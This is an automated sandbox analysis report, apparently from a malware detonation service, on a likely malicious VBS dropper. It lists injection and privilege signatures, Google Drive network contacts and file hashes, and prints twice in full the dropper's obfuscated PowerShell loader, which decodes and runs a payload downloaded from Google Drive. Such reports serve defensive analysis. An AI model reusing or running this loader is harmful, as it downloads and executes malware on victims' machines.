Analysis Overview
SHA256
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
Threat Level: Likely malicious
The file 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-08 07:18
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-08 07:18
Reported
2024-06-08 07:21
Platform
win7-20240508-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2428 wrote to memory of 464 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2428 wrote to memory of 464 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2428 wrote to memory of 464 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 464 wrote to memory of 3064 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 464 wrote to memory of 3064 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 464 wrote to memory of 3064 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers 
';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm 
');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre 
ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. 
sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.179.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 172.217.20.161:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
| Hash | Value |
| --- | --- |
| MD5 | 36113f68a185488c2fbe2bfcf34bcfdc |
| SHA1 | 3e702a1bda44d41c8fad9ad56039be843c9a0706 |
| SHA256 | fb796fb121a29aed4ca01f2cce8d3b59b70afd4978cbecd25625c2c45812e233 |
| SHA512 | 96bd9b00e3a3a6dc789bbb5414206e826b412596c39044b6c8e5d4a8624d49b75a991714858fa7c7d4bd5864cca82473eb311ef08d2fbddc33e1f7ff3f1ade45 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-08 07:18
Reported
2024-06-08 07:21
Platform
win10v2004-20240426-en
Max time kernel
94s
Max time network
95s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2528 wrote to memory of 4808 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2528 wrote to memory of 4808 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4808 wrote to memory of 4776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 4808 wrote to memory of 4776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers 
';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm 
');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre 
ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. 
sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.179.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 78.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 172.217.20.161:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 161.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
| Hash | Value |
| --- | --- |
| MD5 | 290fae52f17dbaeec503dfb5d085abff |
| SHA1 | fdae242a21f6383d0d5aab98f1bf1f3768d833b6 |
| SHA256 | d2390d6c0c3ba3ae1422d582888dcadcb05c387567e3000eb148da64aeb364e9 |
| SHA512 | 7f6d352a85b7fb6c5f5d5d2d76bd081a525ff941b28f481d166a054dbbdcbe0aa4640ea6eb31b226d59f94a4cd5a549df9f041880e481ff397294a048a7a280b |
C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
| Hash | Value |
| --- | --- |
| MD5 | e3c54d10d7b28f4437e5082454a22cb7 |
| SHA1 | f5d6c9ff3d8bebf64c7a03416e005aea2f72f82e |
| SHA256 | 4641feef049099ee8406644631ffb5a83d07c631c29f15490824d649c52c868b |
| SHA512 | f26f744f344c692551d23f0d8281f27bd2bd6de2263b89c1642f3196ac90c28337019e5d47e9b88cf2e607b5a3e70f3c30f9ee94fb9fae43b4f3a351cd309fc6 |
